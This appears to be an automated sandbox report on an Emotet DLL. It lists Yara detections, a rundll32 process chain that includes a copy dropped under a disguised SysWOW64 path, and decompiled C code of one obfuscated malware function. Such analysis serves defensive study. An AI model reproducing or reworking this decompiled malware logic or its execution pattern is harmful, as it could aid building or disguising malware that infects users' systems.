Yara matches:	Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 00000005.00000002.251269260.0000000004DB1000.00000020.00000001.sdmp, Author: Joe Security Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 00000005.00000002.251317536.0000000004E60000.00000040.00000001.sdmp, Author: Joe Security Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 00000005.00000002.251018853.0000000004851000.00000020.00000001.sdmp, Author: Joe Security Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 00000005.00000002.251440561.0000000004FC0000.00000040.00000001.sdmp, Author: Joe Security Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 00000005.00000002.250842742.0000000003070000.00000040.00000001.sdmp, Author: Joe Security Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 00000005.00000002.251474105.0000000004FF1000.00000020.00000001.sdmp, Author: Joe Security Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 00000005.00000002.251540171.0000000005051000.00000020.00000001.sdmp, Author: Joe Security Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 00000005.00000002.251612529.00000000051D1000.00000020.00000001.sdmp, Author: Joe Security Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 00000005.00000002.251214045.0000000004D60000.00000040.00000001.sdmp, Author: Joe Security Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 00000005.00000002.251508844.0000000005020000.00000040.00000001.sdmp, Author: Joe Security Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 00000005.00000002.251355041.0000000004E91000.00000020.00000001.sdmp, Author: Joe Security Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 00000005.00000002.251578591.00000000051A0000.00000040.00000001.sdmp, Author: Joe Security
Reputation:	high

Chronological Activities

Analysis Process: rundll32.exe PID: 3256 Parent PID: 2512

General

Start time:	10:51:39
Start date:	14/01/2022
Path:	C:\Windows\SysWOW64\rundll32.exe
Wow64 process (32bit):	true
Commandline:	C:\Windows\SysWOW64\rundll32.exe "C:\Users\user\Desktop\M2hsMd9hTq.dll",DllRegisterServer
Imagebase:	0x280000
File size:	61952 bytes
MD5 hash:	D7CA562B0DB4F4DD0F03A89A1FDAD63D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high

Chronological Activities

Analysis Process: rundll32.exe PID: 984 Parent PID: 4892

General

Start time:	10:51:39
Start date:	14/01/2022
Path:	C:\Windows\SysWOW64\rundll32.exe
Wow64 process (32bit):	true
Commandline:	C:\Windows\SysWOW64\rundll32.exe "C:\Users\user\Desktop\M2hsMd9hTq.dll",DllRegisterServer
Imagebase:	0x7ff797770000
File size:	61952 bytes
MD5 hash:	D7CA562B0DB4F4DD0F03A89A1FDAD63D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 00000008.00000002.250801502.0000000004CC0000.00000040.00000001.sdmp, Author: Joe Security Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 00000008.00000002.251543763.0000000005450000.00000040.00000001.sdmp, Author: Joe Security Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 00000008.00000002.251348106.0000000005341000.00000020.00000001.sdmp, Author: Joe Security Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 00000008.00000002.251435374.00000000053F0000.00000040.00000001.sdmp, Author: Joe Security Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 00000008.00000002.251287174.0000000005310000.00000040.00000001.sdmp, Author: Joe Security Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 00000008.00000002.251607526.0000000005481000.00000020.00000001.sdmp, Author: Joe Security Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 00000008.00000002.250952211.0000000004DF1000.00000020.00000001.sdmp, Author: Joe Security Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 00000008.00000002.251487303.0000000005421000.00000020.00000001.sdmp, Author: Joe Security
Reputation:	high

Chronological Activities

Analysis Process: rundll32.exe PID: 1264 Parent PID: 4940

General

Start time:	10:51:42
Start date:	14/01/2022
Path:	C:\Windows\SysWOW64\rundll32.exe
Wow64 process (32bit):	true
Commandline:	C:\Windows\SysWOW64\rundll32.exe "C:\Windows\SysWOW64\Zxfif\dcctxlgarqbqh.hrz",JFJwcZZNDUCWxQ
Imagebase:	0x280000
File size:	61952 bytes
MD5 hash:	D7CA562B0DB4F4DD0F03A89A1FDAD63D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 00000009.00000002.254580749.0000000002791000.00000020.00000001.sdmp, Author: Joe Security Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 00000009.00000002.254179155.00000000023D0000.00000040.00000001.sdmp, Author: Joe Security
Reputation:	high

Chronological Activities

Analysis Process: rundll32.exe PID: 4652 Parent PID: 1264

General

Start time:	10:51:43
Start date:	14/01/2022
Path:	C:\Windows\SysWOW64\rundll32.exe
Wow64 process (32bit):	true
Commandline:	C:\Windows\SysWOW64\rundll32.exe "C:\Windows\System32\Zxfif\dcctxlgarqbqh.hrz",DllRegisterServer
Imagebase:	0x280000
File size:	61952 bytes
MD5 hash:	D7CA562B0DB4F4DD0F03A89A1FDAD63D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 0000000A.00000002.764384798.0000000005D70000.00000040.00000001.sdmp, Author: Joe Security Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 0000000A.00000002.764593172.0000000005FD0000.00000040.00000001.sdmp, Author: Joe Security Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 0000000A.00000002.763160491.00000000054F0000.00000040.00000001.sdmp, Author: Joe Security Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 0000000A.00000002.763467558.0000000005790000.00000040.00000001.sdmp, Author: Joe Security Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 0000000A.00000002.764153228.0000000005C70000.00000040.00000001.sdmp, Author: Joe Security Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 0000000A.00000002.763888533.0000000005AA1000.00000020.00000001.sdmp, Author: Joe Security Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 0000000A.00000002.763578627.0000000005870000.00000040.00000001.sdmp, Author: Joe Security Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 0000000A.00000002.763623141.00000000058A1000.00000020.00000001.sdmp, Author: Joe Security Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 0000000A.00000002.761812038.0000000003361000.00000020.00000010.sdmp, Author: Joe Security Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 0000000A.00000002.763204211.0000000005521000.00000020.00000001.sdmp, Author: Joe Security Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 0000000A.00000002.763293110.0000000005601000.00000020.00000001.sdmp, Author: Joe Security Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 0000000A.00000002.762842466.00000000036E1000.00000020.00000001.sdmp, Author: Joe Security Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 0000000A.00000002.764675936.0000000006001000.00000020.00000001.sdmp, Author: Joe Security Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 0000000A.00000002.764435934.0000000005DA1000.00000020.00000001.sdmp, Author: Joe Security Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 0000000A.00000002.763511347.00000000057C1000.00000020.00000001.sdmp, Author: Joe Security Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 0000000A.00000002.763831341.0000000005A70000.00000040.00000001.sdmp, Author: Joe Security Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 0000000A.00000002.764277951.0000000005CA1000.00000020.00000001.sdmp, Author: Joe Security Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 0000000A.00000002.761623893.0000000003330000.00000040.00000010.sdmp, Author: Joe Security Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 0000000A.00000002.763416711.0000000005761000.00000020.00000001.sdmp, Author: Joe Security Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 0000000A.00000002.762037427.0000000003480000.00000040.00000001.sdmp, Author: Joe Security Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 0000000A.00000002.763764045.00000000059C1000.00000020.00000001.sdmp, Author: Joe Security Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 0000000A.00000002.763708229.0000000005990000.00000040.00000001.sdmp, Author: Joe Security Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 0000000A.00000002.763252082.00000000055D0000.00000040.00000001.sdmp, Author: Joe Security Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 0000000A.00000002.763375282.0000000005730000.00000040.00000001.sdmp, Author: Joe Security
Reputation:	high

Chronological Activities

Analysis Process: svchost.exe PID: 3224 Parent PID: 556

General

Start time:	10:51:47
Start date:	14/01/2022
Path:	C:\Windows\System32\svchost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS
Imagebase:	0x7ff797770000
File size:	51288 bytes
MD5 hash:	32569E403279B3FD2EDB7EBD036273FA
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high

Chronological Activities

Analysis Process: svchost.exe PID: 5516 Parent PID: 556

General

Start time:	10:51:56
Start date:	14/01/2022
Path:	C:\Windows\System32\svchost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\System32\svchost.exe -k netsvcs -p
Imagebase:	0x7ff797770000
File size:	51288 bytes
MD5 hash:	32569E403279B3FD2EDB7EBD036273FA
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high

Chronological Activities

Analysis Process: svchost.exe PID: 4488 Parent PID: 556

General

Start time:	10:51:57
Start date:	14/01/2022
Path:	C:\Windows\System32\svchost.exe
Wow64 process (32bit):	false
Commandline:	c:\windows\system32\svchost.exe -k localservice -p -s CDPSvc
Imagebase:	0x7ff797770000
File size:	51288 bytes
MD5 hash:	32569E403279B3FD2EDB7EBD036273FA
Has elevated privileges:	true
Has administrator privileges:	false
Programmed in:	C, C++ or other language

Chronological Activities

Analysis Process: svchost.exe PID: 1404 Parent PID: 556

General

Start time:	10:51:58
Start date:	14/01/2022
Path:	C:\Windows\System32\svchost.exe
Wow64 process (32bit):	false
Commandline:	c:\windows\system32\svchost.exe -k networkservice -p -s DoSvc
Imagebase:	0x7ff797770000
File size:	51288 bytes
MD5 hash:	32569E403279B3FD2EDB7EBD036273FA
Has elevated privileges:	true
Has administrator privileges:	false
Programmed in:	C, C++ or other language

Chronological Activities

Analysis Process: svchost.exe PID: 4564 Parent PID: 556

General

Start time:	10:51:59
Start date:	14/01/2022
Path:	C:\Windows\System32\svchost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\System32\svchost.exe -k NetworkService -p
Imagebase:	0x7ff797770000
File size:	51288 bytes
MD5 hash:	32569E403279B3FD2EDB7EBD036273FA
Has elevated privileges:	true
Has administrator privileges:	false
Programmed in:	C, C++ or other language

Chronological Activities

Analysis Process: SgrmBroker.exe PID: 2224 Parent PID: 556

General

Start time:	10:52:00
Start date:	14/01/2022
Path:	C:\Windows\System32\SgrmBroker.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\SgrmBroker.exe
Imagebase:	0x7ff7c5e70000
File size:	163336 bytes
MD5 hash:	D3170A3F3A9626597EEE1888686E3EA6
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language

Chronological Activities

Analysis Process: svchost.exe PID: 780 Parent PID: 556

General

Start time:	10:52:00
Start date:	14/01/2022
Path:	C:\Windows\System32\svchost.exe
Wow64 process (32bit):	false
Commandline:	c:\windows\system32\svchost.exe -k localservicenetworkrestricted -p -s wscsvc
Imagebase:	0x7ff797770000
File size:	51288 bytes
MD5 hash:	32569E403279B3FD2EDB7EBD036273FA
Has elevated privileges:	true
Has administrator privileges:	false
Programmed in:	C, C++ or other language

Chronological Activities

Analysis Process: svchost.exe PID: 3000 Parent PID: 556

General

Start time:	10:52:05
Start date:	14/01/2022
Path:	C:\Windows\System32\svchost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\System32\svchost.exe -k netsvcs -p
Imagebase:	0x7ff797770000
File size:	51288 bytes
MD5 hash:	32569E403279B3FD2EDB7EBD036273FA
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language

Chronological Activities

Analysis Process: svchost.exe PID: 6036 Parent PID: 556

General

Start time:	10:52:22
Start date:	14/01/2022
Path:	C:\Windows\System32\svchost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\System32\svchost.exe -k netsvcs -p
Imagebase:	0x7ff797770000
File size:	51288 bytes
MD5 hash:	32569E403279B3FD2EDB7EBD036273FA
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language

Chronological Activities

Analysis Process: MpCmdRun.exe PID: 5536 Parent PID: 780

General

Start time:	10:53:01
Start date:	14/01/2022
Path:	C:\Program Files\Windows Defender\MpCmdRun.exe
Wow64 process (32bit):	false
Commandline:	"C:\Program Files\Windows Defender\mpcmdrun.exe" -wdenable
Imagebase:	0x7ff6dbfe0000
File size:	455656 bytes
MD5 hash:	A267555174BFA53844371226F482B86B
Has elevated privileges:	true
Has administrator privileges:	false
Programmed in:	C, C++ or other language

Chronological Activities

Analysis Process: conhost.exe PID: 5500 Parent PID: 5536

General

Start time:	10:53:01
Start date:	14/01/2022
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff7ecfc0000
File size:	625664 bytes
MD5 hash:	EA777DEEA782E8B4D7C7C33BBF8A4496
Has elevated privileges:	true
Has administrator privileges:	false
Programmed in:	C, C++ or other language

Chronological Activities

Analysis Process: svchost.exe PID: 4624 Parent PID: 556

General

Start time:	10:54:09
Start date:	14/01/2022
Path:	C:\Windows\System32\svchost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\System32\svchost.exe -k netsvcs -p
Imagebase:	0x7ff797770000
File size:	51288 bytes
MD5 hash:	32569E403279B3FD2EDB7EBD036273FA
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language

Chronological Activities

Analysis Process: svchost.exe PID: 1560 Parent PID: 556

General

Start time:	10:54:27
Start date:	14/01/2022
Path:	C:\Windows\System32\svchost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\System32\svchost.exe -k netsvcs -p
Imagebase:	0x7ff797770000
File size:	51288 bytes
MD5 hash:	32569E403279B3FD2EDB7EBD036273FA
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language

Chronological Activities

Disassembly

Code Analysis

Reset < >

Analysis Process: regsvr32.exe PID: 2512 Parent PID: 328 regsvr32.exeCOMMON

Execution Graph

Execution Coverage:	5.3%
Dynamic/Decrypted Code Coverage:	13.3%
Signature Coverage:	13.6%
Total number of Nodes:	361
Total number of Limit Nodes:	22

Executed Functions

Function 040EEFDD, Relevance: 12.9, Strings: 10, Instructions: 360
COMMONCrypto

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 95%

			E040EEFDD() {
				char _v520;
				char _v1040;
				char _v1560;
				signed int _v1564;
				signed int _v1568;
				signed int _v1572;
				signed int _v1576;
				signed int _v1580;
				signed int _v1584;
				signed int _v1588;
				signed int _v1592;
				signed int _v1596;
				signed int _v1600;
				signed int _v1604;
				signed int _v1608;
				signed int _v1612;
				signed int _v1616;
				signed int _v1620;
				signed int _v1624;
				signed int _v1628;
				signed int _v1632;
				signed int _v1636;
				signed int _v1640;
				signed int _v1644;
				signed int _v1648;
				signed int _v1652;
				signed int _v1656;
				signed int _v1660;
				signed int _v1664;
				signed int _v1668;
				signed int _v1672;
				signed int _v1676;
				signed int _v1680;
				signed int _v1684;
				signed int _v1688;
				signed int _v1692;
				signed int _v1696;
				signed int _v1700;
				signed int _v1704;
				signed int _v1708;
				signed int _v1712;
				signed int _v1716;
				signed int _v1720;
				signed short* _t381;
				signed int _t393;
				signed int _t395;
				signed int _t397;
				signed int _t398;
				signed int _t399;
				signed int _t400;
				signed int _t401;
				signed int _t402;
				signed int _t403;
				signed int _t404;
				signed int _t405;
				signed int _t415;
				signed int* _t444;
				void* _t445;
				signed int _t449;
				signed int _t450;
				signed short* _t451;
				signed int* _t452;

				_t452 =  &_v1720;
				_v1648 = 0xf9e68a;
				_v1648 = _v1648 ^ 0xa89cfd85;
				_v1648 = _v1648 | 0xe1599fd2;
				_v1648 = _v1648 ^ 0xe97d9ff6;
				_v1592 = 0x52ca29;
				_v1592 = _v1592 + 0xa8c7;
				_v1592 = _v1592 ^ 0x005b0974;
				_v1632 = 0x5fd17f;
				_t397 = 0x55;
				_v1632 = _v1632 / _t397;
				_v1632 = _v1632 + 0x4a14;
				_t395 = 0;
				_v1632 = _v1632 ^ 0x0007d59d;
				_t445 = 0x5f4d19a;
				_v1584 = 0xb2803c;
				_t398 = 0x15;
				_v1584 = _v1584 / _t398;
				_v1584 = _v1584 ^ 0x0001d429;
				_v1700 = 0x18b17c;
				_v1700 = _v1700 >> 4;
				_v1700 = _v1700 << 0xb;
				_v1700 = _v1700 | 0x5bcbde76;
				_v1700 = _v1700 ^ 0x5fd8859a;
				_v1716 = 0x3ed9a0;
				_v1716 = _v1716 >> 2;
				_v1716 = _v1716 | 0xf2214935;
				_v1716 = _v1716 + 0xffff6098;
				_v1716 = _v1716 ^ 0xf2246cf7;
				_v1616 = 0xd3100b;
				_v1616 = _v1616 << 0xb;
				_v1616 = _v1616 ^ 0x988d1f7d;
				_v1576 = 0x49dab3;
				_t399 = 0x41;
				_v1576 = _v1576 / _t399;
				_v1576 = _v1576 ^ 0x00091b0c;
				_v1604 = 0x610b2e;
				_v1604 = _v1604 >> 3;
				_v1604 = _v1604 ^ 0x000d4028;
				_v1708 = 0x5e4148;
				_v1708 = _v1708 * 0x7c;
				_v1708 = _v1708 + 0x543c;
				_v1708 = _v1708 * 0x6e;
				_v1708 = _v1708 ^ 0x9e2c7101;
				_v1580 = 0x8fa7d1;
				_v1580 = _v1580 | 0x5a90bc2e;
				_v1580 = _v1580 ^ 0x5a99780a;
				_v1644 = 0xdfbfec;
				_v1644 = _v1644 ^ 0x5e27e596;
				_v1644 = _v1644 + 0xffff45c7;
				_v1644 = _v1644 ^ 0x5efb0694;
				_v1652 = 0xa5c8eb;
				_v1652 = _v1652 ^ 0x9b43bc99;
				_v1652 = _v1652 * 0x26;
				_v1652 = _v1652 ^ 0x243194e2;
				_v1596 = 0xb87d2a;
				_v1596 = _v1596 ^ 0x06815b6e;
				_v1596 = _v1596 ^ 0x0639024b;
				_v1568 = 0xf0e227;
				_v1568 = _v1568 * 0x3d;
				_v1568 = _v1568 ^ 0x396ce50f;
				_v1572 = 0x747c0d;
				_v1572 = _v1572 + 0xffffb798;
				_v1572 = _v1572 ^ 0x0071a7b9;
				_v1656 = 0x3795ed;
				_v1656 = _v1656 | 0xbce94746;
				_t400 = 0x26;
				_v1656 = _v1656 / _t400;
				_v1656 = _v1656 ^ 0x04ffd641;
				_v1628 = 0xc97098;
				_t401 = 0x3f;
				_v1628 = _v1628 / _t401;
				_v1628 = _v1628 << 2;
				_v1628 = _v1628 ^ 0x0000c1e6;
				_v1664 = 0x186675;
				_v1664 = _v1664 + 0x5979;
				_v1664 = _v1664 + 0xda5e;
				_v1664 = _v1664 ^ 0x0013e2ca;
				_v1672 = 0x37994d;
				_t402 = 0x3c;
				_v1672 = _v1672 / _t402;
				_v1672 = _v1672 << 6;
				_v1672 = _v1672 ^ 0x0033bfe5;
				_v1588 = 0x8a41f;
				_v1588 = _v1588 ^ 0x744a78fd;
				_v1588 = _v1588 ^ 0x744e2179;
				_v1720 = 0x535779;
				_v1720 = _v1720 << 0xd;
				_v1720 = _v1720 + 0x4332;
				_v1720 = _v1720 + 0x735f;
				_v1720 = _v1720 ^ 0x6aed3196;
				_v1692 = 0x449a24;
				_t403 = 0x7f;
				_v1692 = _v1692 / _t403;
				_v1692 = _v1692 >> 0xb;
				_v1692 = _v1692 | 0x1a1cc036;
				_v1692 = _v1692 ^ 0x1a141e74;
				_v1680 = 0xcbdb4c;
				_t404 = 0x32;
				_v1680 = _v1680 / _t404;
				_v1680 = _v1680 + 0xffff62cd;
				_v1680 = _v1680 ^ 0x0005b6c2;
				_v1712 = 0x490fe1;
				_v1712 = _v1712 + 0xffff5c72;
				_v1712 = _v1712 | 0x8d0799de;
				_v1712 = _v1712 + 0xd1c7;
				_v1712 = _v1712 ^ 0x8d59d7bd;
				_v1564 = 0xeb31a6;
				_v1564 = _v1564 + 0x9db9;
				_v1564 = _v1564 ^ 0x00ef2ed2;
				_v1636 = 0x2bc790;
				_v1636 = _v1636 << 0xd;
				_v1636 = _v1636 + 0xc361;
				_v1636 = _v1636 ^ 0x78fc9b03;
				_v1608 = 0x9c27ff;
				_t405 = 0x79;
				_v1608 = _v1608 / _t405;
				_v1608 = _v1608 ^ 0x00083646;
				_v1612 = 0x2811b5;
				_v1612 = _v1612 << 7;
				_v1612 = _v1612 ^ 0x140bb062;
				_v1704 = 0x10f563;
				_v1704 = _v1704 << 7;
				_v1704 = _v1704 + 0x8e91;
				_v1704 = _v1704 >> 1;
				_v1704 = _v1704 ^ 0x043150d1;
				_v1668 = 0xd17281;
				_v1668 = _v1668 + 0xffff6975;
				_v1668 = _v1668 * 5;
				_v1668 = _v1668 ^ 0x041d3199;
				_v1676 = 0x45cf94;
				_v1676 = _v1676 | 0xf5b6f9ff;
				_v1676 = _v1676 ^ 0xf5f7fea4;
				_v1640 = 0xed0f5a;
				_v1640 = _v1640 | 0x16dcab92;
				_v1640 = _v1640 ^ 0xea8ad617;
				_v1640 = _v1640 ^ 0xfc77378a;
				_v1684 = 0xfd4b0d;
				_v1684 = _v1684 ^ 0xf5deb09c;
				_v1684 = _v1684 * 0x14;
				_v1684 = _v1684 ^ 0x26c6ef50;
				_v1600 = 0xb07e76;
				_v1600 = _v1600 + 0x891d;
				_v1600 = _v1600 ^ 0x00bcbcf5;
				_v1660 = 0xdc9573;
				_v1660 = _v1660 | 0xf03871f4;
				_v1660 = _v1660 >> 9;
				_v1660 = _v1660 ^ 0x0071eac7;
				_v1620 = 0x8203d2;
				_v1620 = _v1620 ^ 0xa8466021;
				_v1620 = _v1620 ^ 0xa8c8da0e;
				_v1688 = 0x3e6237;
				_v1688 = _v1688 + 0x1a50;
				_v1688 = _v1688 >> 3;
				_t451 = _v1620;
				_v1688 = _v1688 * 0x2f;
				_v1688 = _v1688 ^ 0x0160f017;
				_v1696 = 0x29d1f1;
				_v1696 = _v1696 + 0xffffde63;
				_v1696 = _v1696 + 0xffff46cf;
				_v1696 = _v1696 * 0x14;
				_v1696 = _v1696 ^ 0x033cdd59;
				_v1624 = 0xc011c7;
				_v1624 = _v1624 + 0xffff119f;
				_v1624 = _v1624 >> 7;
				_v1624 = _v1624 ^ 0x00036cbb;
				while(_t445 != 0x2906f2f) {
					if(_t445 == 0x5f4d19a) {
						E040EFE2A(_v1592, _v1632, 0x208,  &_v1560);
						_pop(_t405);
						_t445 = 0x2906f2f;
						continue;
					}
					if(_t445 == 0x6d37c50) {
						_t381 = _t451;
						__eflags =  *_t451 - _t395;
						if(__eflags == 0) {
							L17:
							_t445 = 0xfe0ac9e;
							continue;
						} else {
							goto L10;
						}
						do {
							L10:
							__eflags =  *_t381 - 0x2c;
							if( *_t381 != 0x2c) {
								goto L16;
							}
							_t444 =  &_v1560;
							while(1) {
								_t381 =  &(_t381[1]);
								_t415 =  *_t381 & 0x0000ffff;
								__eflags = _t415;
								if(_t415 == 0) {
									break;
								}
								__eflags = _t415 - 0x20;
								if(_t415 == 0x20) {
									break;
								}
								 *_t444 = _t415;
								_t444 =  &(_t444[0]);
								__eflags = _t444;
							}
							_t405 = 0;
							__eflags = 0;
							 *_t444 = 0;
							L16:
							_t381 =  &(_t381[1]);
							__eflags =  *_t381 - _t395;
						} while (__eflags != 0);
						goto L17;
					}
					if(_t445 == 0x88437ca) {
						E040D1A34(_v1572,  &_v1040, _t405, _t405, _v1656, _v1628, _v1664, _t405, _v1648, _v1672); // executed
						E040F0DB1(_v1588,  &_v520, __eflags, _v1720, _v1572, _v1692);
						_push(_v1636);
						_push(_v1564);
						_push(_v1712);
						_t449 = E040EE1F8(0x40d1160, _v1680, __eflags);
						E040F2D0A(_v1612, __eflags,  &_v520, _v1704, _v1668, _v1676, 0x40d1160, _t451,  &_v1040, _t449);
						_t405 = _t449;
						E040EFECB(_t405, _v1640, _v1684, _v1600, _v1660);
						_t452 =  &(_t452[0x19]);
						_t445 = 0xc3a6a1c;
						continue;
					}
					if(_t445 == 0xc3a6a1c) {
						_push(_t405);
						E040E85FF(_v1620, _v1688, __eflags, _t395, _t451, _t395, _v1696, _t395, _v1624); // executed
						_t395 = 1;
						__eflags = 1;
						L23:
						return _t395;
					}
					_t462 = _t445 - 0xfe0ac9e;
					if(_t445 == 0xfe0ac9e) {
						_push(_v1576);
						_push(_v1616);
						_push(_v1716);
						_t450 = E040EE1F8(0x40d1120, _v1700, _t462);
						_t393 = E040F061D(_v1604, _t450,  &_v1560, _v1708, _v1580); // executed
						_t405 = _t450;
						asm("sbb edi, edi");
						_t445 = ( ~_t393 & 0x02221bd6) + 0x6621bf4;
						E040EFECB(_t405, _v1644, _v1652, _v1596, _v1568);
						_t452 =  &(_t452[9]);
					}
					L20:
					if(_t445 != 0x6621bf4) {
						continue;
					}
					goto L23;
				}
				_t451 = E040DC307();
				_t445 = 0x6d37c50;
				goto L20;
			}

0x040eefdd
0x040eefe3
0x040eefed
0x040eeff5
0x040eeffd
0x040ef005
0x040ef010
0x040ef01b
0x040ef026
0x040ef038
0x040ef03d
0x040ef043
0x040ef04b
0x040ef04d
0x040ef055
0x040ef05a
0x040ef06c
0x040ef071
0x040ef07a
0x040ef085
0x040ef08d
0x040ef092
0x040ef097
0x040ef09f
0x040ef0a7
0x040ef0af
0x040ef0b4
0x040ef0bc
0x040ef0c4
0x040ef0cc
0x040ef0d4
0x040ef0d9
0x040ef0e1
0x040ef0f3
0x040ef0f6
0x040ef0fd
0x040ef108
0x040ef113
0x040ef11b
0x040ef126
0x040ef133
0x040ef137
0x040ef144
0x040ef148
0x040ef150
0x040ef15b
0x040ef166
0x040ef171
0x040ef179
0x040ef181
0x040ef189
0x040ef191
0x040ef199
0x040ef1a6
0x040ef1aa
0x040ef1b2
0x040ef1bd
0x040ef1c8
0x040ef1d3
0x040ef1e6
0x040ef1ed
0x040ef1f8
0x040ef203
0x040ef210
0x040ef21b
0x040ef223
0x040ef231
0x040ef236
0x040ef23c
0x040ef244
0x040ef250
0x040ef255
0x040ef25b
0x040ef260
0x040ef268
0x040ef270
0x040ef278
0x040ef280
0x040ef288
0x040ef294
0x040ef299
0x040ef29f
0x040ef2a4
0x040ef2ac
0x040ef2b7
0x040ef2c2
0x040ef2cd
0x040ef2d5
0x040ef2da
0x040ef2e2
0x040ef2ea
0x040ef2f2
0x040ef2fe
0x040ef303
0x040ef309
0x040ef30e
0x040ef316
0x040ef31e
0x040ef32a
0x040ef32f
0x040ef335
0x040ef33d
0x040ef345
0x040ef34d
0x040ef355
0x040ef35d
0x040ef365
0x040ef36d
0x040ef378
0x040ef383
0x040ef38e
0x040ef396
0x040ef39b
0x040ef3a3
0x040ef3ab
0x040ef3bd
0x040ef3c0
0x040ef3c7
0x040ef3d2
0x040ef3da
0x040ef3df
0x040ef3e7
0x040ef3ef
0x040ef3f4
0x040ef3fc
0x040ef400
0x040ef408
0x040ef410
0x040ef41d
0x040ef421
0x040ef429
0x040ef431
0x040ef439
0x040ef441
0x040ef449
0x040ef451
0x040ef459
0x040ef461
0x040ef469
0x040ef476
0x040ef47a
0x040ef482
0x040ef48d
0x040ef498
0x040ef4a3
0x040ef4ab
0x040ef4b3
0x040ef4b8
0x040ef4c0
0x040ef4c8
0x040ef4d0
0x040ef4d8
0x040ef4e0
0x040ef4e8
0x040ef4f2
0x040ef4f6
0x040ef4fa
0x040ef502
0x040ef50a
0x040ef512
0x040ef51f
0x040ef523
0x040ef52b
0x040ef533
0x040ef53b
0x040ef540
0x040ef548
0x040ef55a
0x040ef72e
0x040ef734
0x040ef735
0x00000000
0x040ef735
0x040ef566
0x040ef6d1
0x040ef6d3
0x040ef6d7
0x040ef70c
0x040ef70c
0x00000000
0x00000000
0x00000000
0x00000000
0x040ef6d9
0x040ef6d9
0x040ef6d9
0x040ef6dd
0x00000000
0x00000000
0x040ef6df
0x040ef6f4
0x040ef6f4
0x040ef6f7
0x040ef6fa
0x040ef6fd
0x00000000
0x00000000
0x040ef6e8
0x040ef6ec
0x00000000
0x00000000
0x040ef6ee
0x040ef6f1
0x040ef6f1
0x040ef6f1
0x040ef6ff
0x040ef6ff
0x040ef701
0x040ef704
0x040ef704
0x040ef707
0x040ef707
0x00000000
0x040ef6d9
0x040ef572
0x040ef62f
0x040ef64e
0x040ef653
0x040ef65c
0x040ef663
0x040ef673
